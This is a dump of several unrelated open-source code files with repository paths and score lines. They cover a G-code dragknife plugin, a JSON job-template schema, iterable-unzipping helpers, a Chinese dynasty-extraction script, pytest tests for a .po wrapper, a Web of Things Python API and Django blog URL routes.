seg.tangentialOffset(dragoff).A, prevseg.B) if swivelz !=0: arca._inside = [swivelz] npath.append(arca) #Append segment with tangential offset if i < len(opath)-1: npath.append(seg.tangentialOffset(dragoff)) prevseg = seg elif simulate: opath = opath.linearize(simpreci, True) prevknife = initPoint(opath[0].A, initdir, -dragoff) for seg in opath: dist = sqrt((seg.B[0]-prevknife[0])**2+(seg.B[1]-prevknife[1])**2) move = ( seg.B - prevknife ).unit() * ( dist - dragoff ) newknife = prevknife + move if not eq(newknife, prevknife): npath.append(Segment(Segment.LINE, prevknife, newknife)) prevknife = newknife eblock = app.gcode.fromPath(npath) blocks.append(eblock) #active = app.activeBlock() #if active == 0: active+=1 active=-1 #add to end app.gcode.insBlocks(active, blocks, "Dragknife") #<<< insert blocks over active block in the editor app.refresh() #<<< refresh editor app.setStatus(_("Generated: Dragknife")) #<<< feed back result #app.gcode.blocks.append(block)
2.390625
2
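A worked micro-example of the swivel test used in execute() above: the dot product of the adjacent tangents gives the corner angle, and the sign of their 2-D cross product picks the arc direction. The vectors are made up for illustration.

from math import acos, degrees

TA = (1.0, 0.0)   # tangent at the end of the previous segment
TB = (0.0, 1.0)   # tangent at the start of the next segment

angle = degrees(acos(TA[0] * TB[0] + TA[1] * TB[1]))   # 90.0 -> exceeds the threshold
cross = TA[0] * TB[1] - TA[1] * TB[0]                  # positive -> CCW swivel, negative -> CW
print(angle, "CCW" if cross >= 0 else "CW")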
src/ufdl/json/core/jobs/_WorkableTemplateSpec.py
waikato-ufdl/ufdl-json-messages
0
12768683
<reponame>waikato-ufdl/ufdl-json-messages from typing import List from wai.json.object import StrictJSONObject from wai.json.object.property import StringProperty, ArrayProperty from ._InputSpec import InputSpec from ._ParameterSpec import ParameterSpec class WorkableTemplateSpec(StrictJSONObject['WorkableTemplateSpec']): """ JSON document specifying parameters for a job template which can be worked by worker-nodes. """ # The framework being used by the worker node, in 'name|version' format framework: str = StringProperty(min_length=3, max_length=49) # The type of job this template performs job_type: str = StringProperty(min_length=1, max_length=32) # The executor class responsible for executing this template executor_class: str = StringProperty(max_length=128) # Any packages that the executor class requires to complete the task required_packages: str = StringProperty() # The body of the job body: str = StringProperty() # Any inputs to the job required to perform the task inputs: List[InputSpec] = ArrayProperty(element_property=InputSpec.as_property()) # Any parameters to the job required to perform the task parameters: List[ParameterSpec] = ArrayProperty(element_property=ParameterSpec.as_property())
1.296875
1
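For reference, a hypothetical JSON document matching the properties declared above; all field values are invented for illustration, and the real inputs/parameters entries would be InputSpec and ParameterSpec documents.

workable_template_doc = {
    "framework": "tensorflow|1.14",          # 'name|version' format
    "job_type": "train",
    "executor_class": "ufdl.joblauncher.ExampleExecutor",  # assumed name
    "required_packages": "example-package==1.0",
    "body": "...",
    "inputs": [],       # InputSpec documents
    "parameters": [],   # ParameterSpec documents
}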
draugr/generators/zipping_generator.py
cnHeider/draugr
3
12768811
#!/usr/bin/env python3 # -*- coding: utf-8 -*- from copy import deepcopy from typing import Any, Generator, Iterable, Iterator __author__ = "<NAME>" __doc__ = r""" Created on 28/10/2019 """ __all__ = ["unzip", "unzipper"] def unzip(iterable: Iterable) -> Iterable: """ """ return zip(*iterable) def unzipper(iterable: Iterable[Iterable]) -> Iterable: """ Unzips an iterable of an iterable Be carefully has undefined and expected behaviour :param iterable: :return:""" def check_next_iter(iterable: Any) -> Any: """ """ if isinstance(iterable, Iterable): try: a = next(iter(iterable)) if isinstance(a, Iterable): return a except StopIteration: pass if isinstance(iterable, Iterable): check_a = check_next_iter(check_next_iter(deepcopy(iterable))) if check_next_iter(check_a): for a in iterable: yield unzipper(a) elif check_a: for a in iterable: yield unzip(a) else: for i in iterable: yield i return if __name__ == "__main__": def recursive_eval(node: Any): """ """ if isinstance(node, (Iterable, Generator, Iterator)): gather = [] for i in node: gather.append(recursive_eval(i)) return gather return node def aasda(): """ """ r = range(4) print(0) a = [[[*r] for _ in r] for _ in r] print(a) print(1) for _, assd in zip(r, unzipper(a)): print() print(recursive_eval(assd)) print() for _, (a, *_) in zip(r, unzipper(a)): print() print(recursive_eval(a)) print() print(2) def skad23(): """ """ print(0) zippy_once = zip(range(6), range(3)) dsadsa = list(deepcopy(zippy_once)) zippy_twice = zip(dsadsa, dsadsa) zippy_twice_copy = deepcopy(zippy_twice) asds = list(deepcopy(zippy_twice_copy)) zippy_trice = zip(asds, asds) zippy_trice_copy = deepcopy(zippy_trice) print(1) for aa in zippy_twice: print(recursive_eval(aa)) print(2) for a1 in unzip(zippy_twice_copy): print(recursive_eval(a1)) print(3) for a1 in unzip(zippy_once): print(recursive_eval(a1)) print(4) for a1 in zippy_trice: print(recursive_eval(a1)) print(5) for a1 in unzip(zippy_trice_copy): print(recursive_eval(a1)) print(6) def skad(): """ """ print(0) zippy_once = zip(zip(range(6), range(3))) zippy_once_copy = deepcopy(zippy_once) dsadsa = list(deepcopy(zippy_once)) zippy_twice = zip(dsadsa, dsadsa) zippy_twice_copy = deepcopy(zippy_twice) asds = list(deepcopy(zippy_twice_copy)) zippy_trice = zip(asds, asds) zippy_trice_copy = deepcopy(zippy_trice) asds2323 = list(deepcopy(zippy_trice_copy)) zippy_quad = zip(asds2323, asds2323) zippy_quad_copy = deepcopy(zippy_quad) print(1) for aa in zippy_twice: print(recursive_eval(aa)) print(2) for a1 in unzipper(zippy_twice_copy): print(recursive_eval(a1)) print(3) for a1 in zippy_once_copy: print(recursive_eval(a1)) print(4) for a1 in unzipper(zippy_once): print(recursive_eval(a1)) print(5) for a1 in zippy_trice: print(recursive_eval(a1)) print(6) for a1 in unzipper(zippy_trice_copy): print(recursive_eval(a1)) print(7) for a1 in zippy_quad: print(recursive_eval(a1)) print(8) for a1 in unzipper(zippy_quad_copy): print(recursive_eval(a1)) print(9) aasda() print() print("asafasdw") print() skad() # skad23()
2.21875
2
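Quick usage sketch of the transpose behaviour implemented by unzip() above, shown self-contained: zip(*iterable) is exactly what the helper does.

pairs = [(0, 'a'), (1, 'b'), (2, 'c')]
nums, letters = zip(*pairs)   # what unzip(pairs) returns
print(nums, letters)          # (0, 1, 2) ('a', 'b', 'c')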
Archive/dynasty_extract.py
46319943/SLan-NLP
0
12768939
<reponame>46319943/SLan-NLP<filename>Archive/dynasty_extract.py import re def past_time_concat(loc_list: list): ''' 连接误分割的公元前字符串 ''' loc_list = loc_list.copy() for index, loc_str in enumerate(loc_list): if loc_str == '公元前' and '000' in loc_list[index + 1]: loc_list[index] = loc_list[index] + loc_list[index + 1] loc_list[index + 1] = '' print(loc_list[index]) return loc_list def time_filter(time_str: str) -> str: ''' 过滤无法判断时间的词语 归类表示现在的词语 :param time_str: :return: ''' if time_str == '' or time_str == ' ': return None if time_str in [ '每年', '每日', '当时', '中期', '此后', '当年', '早期', '昔日', '明天', '同年', '一时', '过去', '每天', '一日', '其后', '次年', '未来', '后来', '初年', '后期', '古代', '初期', '今', ]: return None if time_str in [ '目前', '现在', '今天', '近年', '现代', '现', '今日', '近代', '此时', '近现代', '当代', '当前']: return '现代' time_str = time_str.replace('时期', '') return time_str def year_filter(time_str: str) -> str: ''' 将年转为具体朝代 :param time_str: :return: ''' if '年' not in time_str: return time_str if time_str.startswith('近'): return None if '以后' in time_str: return None if time_str == '2020年前': return None time_str.replace('1700万,1850年', '1850年') pattern_before = re.search('前\S*?(\d{3,4})', time_str) pattern_past = re.search('(\d{3,4})\S*?前', time_str) pattern_4 = re.search('\d{4}', time_str) pattern_3 = re.search('\d{3}', time_str) pattern_2 = re.search('公元(\d{2})', time_str) if pattern_before: time_int = -int(pattern_before.group(1)) elif pattern_past: time_int = 2021 - int(pattern_past.group(1)) elif '多年' in time_str: time_int = None elif pattern_4: time_int = int(pattern_4.group(0)) elif pattern_3: time_int = int(pattern_3.group(0)) elif pattern_2: time_int = int(pattern_2.group(1)) else: time_int = None # if re.search('\d{4}', time_str): # print(time_str + ' --> ' + re.search('\d{4}', time_str).group(0)) # return re.search('\d{4}', time_str).group(0) # elif re.search('\d{1,2}', time_str): # print(time_str + 'X') # return None # if time_int is not None: # print(time_str + ' --> ' + str(time_int)) # return str(time_int) # else: # print(time_str + ' X') # return None if time_int is None: return None if time_int >= 1368 and time_int <= 1644: return '明朝' elif time_int >= 1644 and time_int <= 1912: return '清朝' elif time_int > 1912: return '现代' elif time_int >= 1279 and time_int <= 1368: return '元朝' elif time_int >= 907 and time_int <= 1279: return '宋朝' elif time_int >= 618 and time_int <= 907: return '唐朝' elif time_int >= 581 and time_int <= 618: return '隋朝' elif time_int >= 265 and time_int <= 581: return '魏晋南北朝' elif time_int >= 220 and time_int <= 265: return '三国' elif time_int >= -206 and time_int <= 220: return '汉代' elif time_int >= -221 and time_int <= -206: return '秦代' elif time_int >= -770 and time_int <= -221: return '春秋战国' elif time_int >= -1100 and time_int <= -770: return '西周' elif time_int >= -1600 and time_int <= -1100: return '商代' elif time_int >= -2100 and time_int <= -1600: return '夏代' elif time_int <= -2100: return '黄帝' else: raise Exception('No dynasty matched') def dynasty_filter(time_str) -> str: import re mapping_dict = { '西汉初期': '汉代', '西汉': '汉代', '明中期': '明朝', '唐时': '唐朝', '商末': '商代', '东汉初': '汉代', '当上元': '唐朝', '盛唐': '唐朝', '元朝末期': '元朝', '五代': '宋朝', '北魏': '魏晋南北朝', '秦汉': ['秦代', '汉代'], '元朝初': '元朝', '明前期': '明朝', '民国初': '现代', '明': '明朝', '明清时': ['明朝', '清朝'], '五代十国': '宋朝', '晚唐': '唐朝', '隋末': '隋朝', '唐中': '唐朝', '宋末': '宋朝', '唐末': '唐朝', '魏晋': '魏晋南北朝', '明朝中期': '明朝', '先秦': '秦代', '战国': '春秋战国', '汉朝': '汉代', '宋元': ['宋朝', '元朝'], '明清': ['明朝', '清朝'], '清代': '清朝', '元代': '元朝', '明代': '明朝', '宋代': '宋朝', '唐代': '唐朝', '隋代': '隋朝', '南北朝': 
'魏晋南北朝', '晚清': '清朝', '春秋': '春秋战国', '元末': '元朝', '元初': '元朝', '东汉': '汉代', '唐': '唐朝', '民国': '现代', '秦朝': '秦代', '唐宋': ['唐朝', '宋朝'], '明末': '明朝', '明初': '明朝', '清初': '清朝', '隋唐': ['隋朝', '唐朝'], '清末': '清朝', } if time_str in mapping_dict: return mapping_dict[time_str] return time_str def dynasty_select(time_str: str) -> bool: return time_str in ['现代', '清朝', '明朝', '唐朝', '宋朝', '元朝', '隋朝', '魏晋南北朝', '春秋战国', '汉代', '秦代', '三国', '黄帝', '夏代', '西周', '商代'] def dynasty_extract(loc_list: list): loc_list = loc_list.copy() loc_list = past_time_concat(loc_list) loc_list = [time_filter(time_str) for time_str in loc_list if time_filter(time_str) is not None] loc_list = [year_filter(time_str) for time_str in loc_list if year_filter(time_str) is not None] loc_list_copy = loc_list.copy() loc_list = [] for index, time_str in enumerate(loc_list_copy): dynasty_result = dynasty_filter(time_str) if isinstance(dynasty_result, list): loc_list.extend(dynasty_result) else: loc_list.append(dynasty_result) loc_list = [time_str for time_str in loc_list if dynasty_select(time_str)] return loc_list def dynasty_extract_plus_loc(time_list, loc_list): pass if __name__ == '__main__': import pandas as pd from slab.pickle_util import pickle_to_file, unpickle_from_file df = unpickle_from_file('df.pkl') loc_list = df['line_time_result'].values loc_list = [word for line in loc_list for word in line] print(pd.Series(dynasty_extract(loc_list)).value_counts())
1.992188
2
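A hedged usage sketch of the year-to-dynasty mapping above; it assumes the file is importable as dynasty_extract (it lives under Archive/), and the expected outputs are read off the ranges coded in year_filter().

from dynasty_extract import time_filter, year_filter

print(time_filter('目前'))          # '现代'  (normalised "present day" term)
print(year_filter('公元前500年'))    # '春秋战国' (-500 falls in -770..-221)
print(year_filter('1850年'))        # '清朝'   (1644..1912)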
tests/test_powrap.py
deronnax/powrap
1
12769067
from pathlib import Path

import pytest
import os

from powrap import powrap

FIXTURE_DIR = Path(__file__).resolve().parent


@pytest.mark.parametrize("po_file", (FIXTURE_DIR / "bad" / "glossary.po",))
def test_fail_on_bad_wrapping(po_file, capsys):
    assert powrap.check_style([po_file]) == 1
    assert str(po_file) in capsys.readouterr().err


@pytest.mark.parametrize("po_file", (FIXTURE_DIR / "good").glob("*.po"))
def test_succeeds_on_good_wrapping(po_file, capsys):
    assert powrap.check_style([po_file]) == 0
    assert str(po_file) not in capsys.readouterr().err


@pytest.mark.parametrize("po_file", (FIXTURE_DIR / "bad" / "invalid_po_file.po",))
def test_msgcat_error(po_file, capsys):
    assert powrap.check_style([po_file]) == 0
    assert str(po_file) not in capsys.readouterr().err


@pytest.mark.parametrize("po_file", ("non_existent_file.po",))
def test_fileread_error(po_file, capsys):
    assert powrap.check_style([po_file]) == 0
    assert str(po_file) not in capsys.readouterr().err


@pytest.mark.parametrize("po_file", (FIXTURE_DIR / "good").glob("*.po"))
def test_wrong_msgcat(po_file):
    """Test behaviour when msgcat is not available."""
    environ_saved = os.environ["PATH"]
    os.environ["PATH"] = ""
    with pytest.raises(SystemExit) as sysexit:
        powrap.check_style([po_file])
    os.environ["PATH"] = environ_saved
    assert sysexit.type == SystemExit
    assert sysexit.value.code == 127
1.40625
1
wotpy/wot/wot.py
JKRhb/wot-py
24
12769195
#!/usr/bin/env python # -*- coding: utf-8 -*- """ Class that serves as the WoT entrypoint. """ import json import logging import warnings import six import tornado.concurrent import tornado.gen import tornado.ioloop from rx import Observable from six.moves import range from tornado.httpclient import AsyncHTTPClient, HTTPRequest from wotpy.support import is_dnssd_supported from wotpy.utils.utils import handle_observer_finalization from wotpy.wot.consumed.thing import ConsumedThing from wotpy.wot.dictionaries.thing import ThingFragment from wotpy.wot.enums import DiscoveryMethod from wotpy.wot.exposed.thing import ExposedThing from wotpy.wot.td import ThingDescription from wotpy.wot.thing import Thing DEFAULT_FETCH_TIMEOUT_SECS = 20.0 class WoT(object): """The WoT object is the API entry point and it is exposed by an implementation of the WoT Runtime. The WoT object does not expose properties, only methods for discovering, consuming and exposing a Thing.""" def __init__(self, servient): self._servient = servient self._logr = logging.getLogger(__name__) @property def servient(self): """Servient instance of this WoT entrypoint.""" return self._servient @classmethod def _is_fragment_match(cls, item, thing_filter): """Returns True if the given item (an ExposedThing, Thing or TD) matches the fragment in the given Thing filter.""" td = None if isinstance(item, ExposedThing): td = ThingDescription.from_thing(item.thing) elif isinstance(item, Thing): td = ThingDescription.from_thing(item) elif isinstance(item, ThingDescription): td = item assert td fragment_dict = thing_filter.fragment if thing_filter.fragment else {} return all( item in six.iteritems(td.to_dict()) for item in six.iteritems(fragment_dict)) def _build_local_discover_observable(self, thing_filter): """Builds an Observable to discover Things using the local method.""" found_tds = [ ThingDescription.from_thing(exposed_thing.thing).to_str() for exposed_thing in self._servient.exposed_things if self._is_fragment_match(exposed_thing, thing_filter) ] # noinspection PyUnresolvedReferences return Observable.of(*found_tds) def _build_dnssd_discover_observable(self, thing_filter, dnssd_find_kwargs): """Builds an Observable to discover Things using the multicast method based on DNS-SD.""" if not is_dnssd_supported(): warnings.warn("Unsupported DNS-SD multicast discovery") # noinspection PyUnresolvedReferences return Observable.empty() dnssd_find_kwargs = dnssd_find_kwargs if dnssd_find_kwargs else {} if not self._servient.dnssd: # noinspection PyUnresolvedReferences return Observable.empty() def subscribe(observer): """Browses the Servient services using DNS-SD and retrieves the TDs that match the filters.""" state = {"stop": False} @handle_observer_finalization(observer) @tornado.gen.coroutine def callback(): address_port_pairs = yield self._servient.dnssd.find(**dnssd_find_kwargs) def build_pair_url(idx, path=None): addr, port = address_port_pairs[idx] base = "http://{}:{}".format(addr, port) path = path if path else '' return "{}/{}".format(base, path.strip("/")) http_client = AsyncHTTPClient() catalogue_resps = [ http_client.fetch(build_pair_url(idx)) for idx in range(len(address_port_pairs)) ] wait_iter = tornado.gen.WaitIterator(*catalogue_resps) while not wait_iter.done() and not state["stop"]: try: catalogue_resp = yield wait_iter.next() except Exception as ex: self._logr.warning( "Exception on HTTP request to TD catalogue: {}".format(ex)) else: catalogue = json.loads(catalogue_resp.body) if state["stop"]: return td_resps = yield [ 
http_client.fetch(build_pair_url( wait_iter.current_index, path=path)) for thing_id, path in six.iteritems(catalogue) ] tds = [ ThingDescription(td_resp.body) for td_resp in td_resps ] tds_filtered = [ td for td in tds if self._is_fragment_match(td, thing_filter)] [observer.on_next(td.to_str()) for td in tds_filtered] def unsubscribe(): state["stop"] = True tornado.ioloop.IOLoop.current().add_callback(callback) return unsubscribe # noinspection PyUnresolvedReferences return Observable.create(subscribe) def discover(self, thing_filter, dnssd_find_kwargs=None): """Starts the discovery process that will provide ThingDescriptions that match the optional argument filter of type ThingFilter.""" supported_methods = [ DiscoveryMethod.ANY, DiscoveryMethod.LOCAL, DiscoveryMethod.MULTICAST ] if thing_filter.method not in supported_methods: err = NotImplementedError("Unsupported discovery method") # noinspection PyUnresolvedReferences return Observable.throw(err) if thing_filter.query: err = NotImplementedError( "Queries are not supported yet (please use filter.fragment)") # noinspection PyUnresolvedReferences return Observable.throw(err) observables = [] if thing_filter.method in [DiscoveryMethod.ANY, DiscoveryMethod.LOCAL]: observables.append( self._build_local_discover_observable(thing_filter)) if thing_filter.method in [DiscoveryMethod.ANY, DiscoveryMethod.MULTICAST]: observables.append(self._build_dnssd_discover_observable( thing_filter, dnssd_find_kwargs)) # noinspection PyUnresolvedReferences return Observable.merge(*observables) @classmethod @tornado.gen.coroutine def fetch(cls, url, timeout_secs=None): """Accepts an url argument and returns a Future that resolves with a Thing Description string.""" timeout_secs = timeout_secs or DEFAULT_FETCH_TIMEOUT_SECS http_client = AsyncHTTPClient() http_request = HTTPRequest(url, request_timeout=timeout_secs) http_response = yield http_client.fetch(http_request) td_doc = json.loads(http_response.body) td = ThingDescription(td_doc) raise tornado.gen.Return(td.to_str()) def consume(self, td_str): """Accepts a thing description string argument and returns a ConsumedThing object instantiated based on that description.""" td = ThingDescription(td_str) return ConsumedThing(servient=self._servient, td=td) @classmethod def thing_from_model(cls, model): """Takes a ThingModel and builds a Thing. 
Raises if the model has an unexpected type.""" expected_types = (six.string_types, ThingFragment, ConsumedThing) if not isinstance(model, expected_types): raise ValueError("Expected one of: {}".format(expected_types)) if isinstance(model, six.string_types): thing = ThingDescription(doc=model).build_thing() elif isinstance(model, ThingFragment): thing = Thing(thing_fragment=model) else: thing = model.td.build_thing() return thing def produce(self, model): """Accepts a model argument of type ThingModel and returns an ExposedThing object, locally created based on the provided initialization parameters.""" thing = self.thing_from_model(model) exposed_thing = ExposedThing(servient=self._servient, thing=thing) self._servient.add_exposed_thing(exposed_thing) return exposed_thing @tornado.gen.coroutine def produce_from_url(self, url, timeout_secs=None): """Return a Future that resolves to an ExposedThing created from the thing description retrieved from the given URL.""" td_str = yield self.fetch(url, timeout_secs=timeout_secs) exposed_thing = self.produce(td_str) raise tornado.gen.Return(exposed_thing) @tornado.gen.coroutine def consume_from_url(self, url, timeout_secs=None): """Return a Future that resolves to a ConsumedThing created from the thing description retrieved from the given URL.""" td_str = yield self.fetch(url, timeout_secs=timeout_secs) consumed_thing = self.consume(td_str) raise tornado.gen.Return(consumed_thing) @tornado.gen.coroutine def register(self, directory, thing): """Generate the Thing Description as td, given the Properties, Actions and Events defined for this ExposedThing object. Then make a request to register td to the given WoT Thing Directory.""" raise NotImplementedError() @tornado.gen.coroutine def unregister(self, directory, thing): """Makes a request to unregister the thing from the given WoT Thing Directory.""" raise NotImplementedError()
1.679688
2
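A hedged usage sketch of the entry-point methods documented above. It assumes a Servient has already been configured elsewhere (wotpy wiring not shown) and uses a placeholder URL.

import tornado.gen

@tornado.gen.coroutine
def demo(wot):
    # Fetch a TD and consume the remote thing...
    consumed = yield wot.consume_from_url("http://example.com/td.json")
    # ...or fetch the TD string and expose a local thing built from it.
    td_str = yield wot.fetch("http://example.com/td.json")
    exposed = wot.produce(td_str)
    raise tornado.gen.Return((consumed, exposed))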
3rdparty/packages/all.py
cspanier/shift
2
12769323
#!/usr/bin/env python3 import sys from build import Builder package_name = Builder.package_name_from_filename(__file__) dependencies = ('zlib-1.2.11', 'bzip2-1.0.8', 'jpeg-9c', 'zstd-be3bd70', 'tiff-4.0.10', 'icu4c-65_1', 'boost_1_71_0') def prepare(builder): return True def build(builder): return True def cleanup(builder): return True if __name__ == "__main__": print('You must not call this script directly.') sys.exit(1)
1.09375
1
models/multi_emnist.py
OpenXAIProject/dac
17
12769451
<filename>models/multi_emnist.py import os import argparse import matplotlib.pyplot as plt import torch import torch.nn as nn import torch.nn.functional as F import torch.optim as optim from torchvision.utils import make_grid from torch.nn.utils import weight_norm from utils.misc import add_args from utils.paths import datasets_path, benchmarks_path from utils.tensor import to_numpy from data.base import sample_anchors from data.multi_emnist import ClusteredMultiEMNIST, sample_idxs, \ get_train_loader, get_test_loader from modules.attention import StackedISAB, PMA, MAB from modules.misc import Flatten, View from flows.autoregressive import MAF from flows.distributions import FlowDistribution, Normal, Bernoulli from models.base import AnchoredFilteringModel, MinFilteringModel parser = argparse.ArgumentParser() # for training parser.add_argument('--B', type=int, default=10) parser.add_argument('--N', type=int, default=100) parser.add_argument('--K', type=int, default=4) parser.add_argument('--lr', type=float, default=2e-4) parser.add_argument('--num_steps', type=int, default=20000) parser.add_argument('--filtering_benchmark', type=str, default=None) parser.add_argument('--clustering_benchmark', type=str, default=None) parser.add_argument('--vB', type=int, default=1) parser.add_argument('--vN', type=int, default=100) parser.add_argument('--vK', type=int, default=4) sub_args, _ = parser.parse_known_args() class FilteringNetwork(nn.Module): def __init__(self, num_filters=32, dim_lats=128, dim_hids=256, dim_context=256, num_inds=32): super().__init__() C = num_filters self.enc = nn.Sequential( nn.Conv2d(3, C, 3, stride=2), nn.BatchNorm2d(C), nn.ReLU(), nn.Conv2d(C, 2*C, 3, stride=2), nn.BatchNorm2d(2*C), nn.ReLU(), nn.Conv2d(2*C, 4*C, 3), Flatten()) self.isab1 = StackedISAB(4*C*4*4, dim_hids, num_inds, 4) self.pma = PMA(dim_hids, dim_hids, 1) self.fc1 = nn.Linear(dim_hids, dim_context) self.posterior = Normal(dim_lats, use_context=True, context_enc=nn.Linear(4*C*4*4 + dim_context, 2*dim_lats)) self.prior = FlowDistribution( MAF(dim_lats, dim_hids, 6, dim_context=dim_context, inv_linear=True), Normal(dim_lats)) self.dec = nn.Sequential( nn.Linear(dim_lats + dim_context, 4*C*4*4), nn.ReLU(), View(-1, 4*C, 4, 4), nn.ConvTranspose2d(4*C, 2*C, 3, stride=2, padding=1), nn.BatchNorm2d(2*C), nn.ReLU(), nn.ConvTranspose2d(2*C, C, 3, stride=2, padding=1), nn.BatchNorm2d(C), nn.ReLU(), nn.ConvTranspose2d(C, 3, 3, stride=2, output_padding=1), View(-1, 3, 28, 28)) self.likel = Bernoulli((3, 28, 28), use_context=True) self.mab = MAB(dim_hids, dim_hids, dim_hids) self.isab2 = StackedISAB(dim_hids, dim_hids, num_inds, 4) self.fc2 = nn.Linear(dim_hids, 1) def forward(self, X, mask=None, return_z=False): B, N, C, H, W = X.shape x = X.view(B*N, C, H, W) h_enc = self.enc(x) H_X = self.isab1(h_enc.view(B, N, -1), mask=mask) H_theta = self.pma(H_X, mask=mask) theta = self.fc1(H_theta) theta_ = theta.repeat(1, N, 1).view(B*N, -1) z, logq = self.posterior.sample(context=torch.cat([h_enc, theta_], -1)) logp = self.prior.log_prob(z, context=theta_) kld = (logq - logp).view(B, N) h_dec = self.dec(torch.cat([z, theta_], -1)) ll = self.likel.log_prob(x, context=h_dec).view(B, N) - kld ll /= H*W H_dec = self.mab(H_X, H_theta) logits = self.fc2(self.isab2(H_dec, mask=mask)).squeeze(-1) outputs = {'ll':ll, 'theta':theta, 'logits':logits} if return_z: outputs['z'] = z return outputs class Model(MinFilteringModel): def __init__(self, args): super().__init__(args) self.filtering_benchmark = os.path.join(benchmarks_path, 
'memnist_10_100_4.tar') \ if self.filtering_benchmark is None \ else os.path.join(benchmarks_path, self.filtering_benchmark) self.clustering_benchmark = os.path.join(benchmarks_path, 'memnist_10_300_12.tar') \ if self.clustering_benchmark is None \ else os.path.join(benchmarks_path, self.clustering_benchmark) self.net = FilteringNetwork() self.train_metrics = ['ll', 'bcent'] self.test_metrics = ['ll', 'bcent'] def sample(self, B, N, K, **kwargs): dataset = ClusteredMultiEMNIST(train=False) batch = sample_idxs(dataset.idx_to_class, B, N, K, **kwargs) return dataset[batch] def build_train_loader(self): self.train_loader = get_train_loader(self.B, self.N, self.K, self.num_steps, rand_N=True, rand_K=True) def build_test_loader(self, filename=None): filename = self.filtering_benchmark if filename is None else filename self.test_loader = get_test_loader(filename) def gen_benchmarks(self, force=False): if not os.path.isfile(self.filtering_benchmark) or force: print('generating benchmark {}...'.format(self.filtering_benchmark)) idx_to_class = ClusteredMultiEMNIST(train=False).idx_to_class bench = [sample_idxs(idx_to_class, 10, 100, 4, rand_N=True, rand_K=True) \ for _ in range(100)] torch.save(bench, self.filtering_benchmark) print('generating benchmark {}...'.format(self.clustering_benchmark)) bench = [sample_idxs(idx_to_class, 10, 300, 12, rand_N=True, rand_K=True) \ for _ in range(100)] torch.save(bench, self.clustering_benchmark) def combine_digits(self, X): B, N, C, H, W = X.shape cX = torch.zeros(B, N, 1, 2*H, 2*W) cX[:,:,0,:H,:W] = X[:,:,0,:,:] cX[:,:,0,:H,W:] = X[:,:,1,:,:] cX[:,:,0,H:,:W] = X[:,:,2,:,:] return cX def plot_clustering(self, X, results): X = self.combine_digits(X)[0] labels = results['labels'][0] ulabels = torch.unique(labels) K = len(ulabels) fig, axes = plt.subplots(1, K, figsize=(50, 50)) for k, l in enumerate(ulabels): Xk = X[labels==l] Xk = Xk[: Xk.shape[0] - Xk.shape[0] % 4] I = to_numpy(make_grid(1-Xk, nrow=4, pad_value=0)).transpose(1, 2, 0) axes[k].set_title('cluster {}'.format(k+1), fontsize=100) axes[k].imshow(I) axes[k].axis('off') plt.tight_layout() def plot_filtering(self, batch): X = batch['X'].cuda() B, N, C, H, W = X.shape net = self.net net.eval() with torch.no_grad(): outputs = net(X, return_z=True) theta = outputs['theta'] theta_ = theta.repeat(1, N, 1).view(B*N, -1) labels = (outputs['logits'] > 0.0).long() # conditional generation z, _ = net.prior.sample(B*N, device='cuda', context=theta_) h_dec = net.dec(torch.cat([z, theta_], -1)) gX, _ = net.likel.sample(context=h_dec) gX = gX.view(B, N, C, H, W) z = outputs['z'] h_dec = net.dec(torch.cat([z, theta_], -1)) rX, _ = net.likel.sample(context=h_dec) rX = rX.view(B, N, C, H, W) fig, axes = plt.subplots(1, 2, figsize=(40, 40)) X = self.combine_digits(X)[0] labels = labels[0] X1 = X[labels==1] X1 = X1[: X1.shape[0] - X1.shape[0] % 8] I = to_numpy(make_grid(1-X1, nrow=8, pad_value=0)).transpose(1, 2, 0) axes[0].imshow(I) axes[0].set_title('Filtered out images', fontsize=60, pad=20) axes[0].axis('off') X0 = X[labels==0] X0 = X0[: X0.shape[0] - X0.shape[0] % 8] I = to_numpy(make_grid(1-X0, nrow=8, pad_value=0)).transpose(1, 2, 0) axes[1].imshow(I) axes[1].set_title('Remaining images', fontsize=60, pad=20) axes[1].axis('off') plt.tight_layout() #plt.savefig('figures/emnist_filtering.png', bbox_inches='tight') gX = self.combine_digits(gX)[0][:32] plt.figure() I = to_numpy(make_grid(1-gX, nrow=8, pad_value=0)).transpose(1, 2, 0) plt.imshow(I) plt.title('Generated images', fontsize=15, pad=5) plt.axis('off') 
#plt.savefig('figures/emnist_gen.png', bbox_inches='tight') fig, axes = plt.subplots(1, 2, figsize=(40, 40)) rX = self.combine_digits(rX)[0] X1 = rX[labels==1] X1 = X1[: X1.shape[0] - X1.shape[0] % 8] I = to_numpy(make_grid(1-X1, nrow=8, pad_value=0)).transpose(1, 2, 0) axes[0].imshow(I) axes[0].set_title('Reconstructions of filtered out images', fontsize=60, pad=20) axes[0].axis('off') X0 = rX[labels==0] X0 = X0[: X0.shape[0] - X0.shape[0] % 8] I = to_numpy(make_grid(1-X0, nrow=8, pad_value=0)).transpose(1, 2, 0) axes[1].imshow(I) axes[1].set_title('Reconstructions of remaining images', fontsize=60, pad=20) axes[1].axis('off') plt.tight_layout() #plt.savefig('figures/emnist_recon.png', bbox_inches='tight') def load(args): add_args(args, sub_args) return Model(args)
1.96875
2
blog/urls.py
boost-entropy-repos-org/ojas
0
12769579
from django.conf.urls import url from django.urls import path,include from . import views from .feeds import LatestPostsFeed from .views import search, PostViewSet from rest_framework import routers from django.views.generic import TemplateView router = routers.DefaultRouter() router.register(r'api', PostViewSet) app_name = 'blog' urlpatterns = [ path('', views.most_viewed, name='most_viewed'), path('article/', views.post_list, name='post_list'), url(r'^tag/(?P<tag_slug>[-\w]+)/$', views.post_list, name='post_list_by_tag'), url(r'^blog/(?P<year>\d{4})-(?P<month>\d{2})-(?P<day>\d{2})/(?P<post>[-\w]+)/$', views.post_detail, name='post_detail'), path('feed/', LatestPostsFeed(), name='post_feed'), path('about/', views.about_page, name='about'), path('contact/', views.contact_page, name='contact_page'), url(r'^author/(?P<post_author>[-\w]+)/$',views.post_author, name='post_author'), path('search', search, name='search'), path('me/', views.me, name='me'), path('', include(router.urls)), path('api-auth/', include('rest_framework.urls')), path('offline/', views.offline, name='offline'), path('fill-dynamic-cache/<int:id>', views.fill_dynamic_cache, name='fill_dynamic_cache'), path('must-not-cache', views.must_not_cache, name='must_not_cache'), path( 'sw.js', views.ServiceWorkerView.as_view(), name=views.ServiceWorkerView.name, ), ]
1.328125
1
pycles/pycles.py
matthewkovacs/pycles
0
12769707
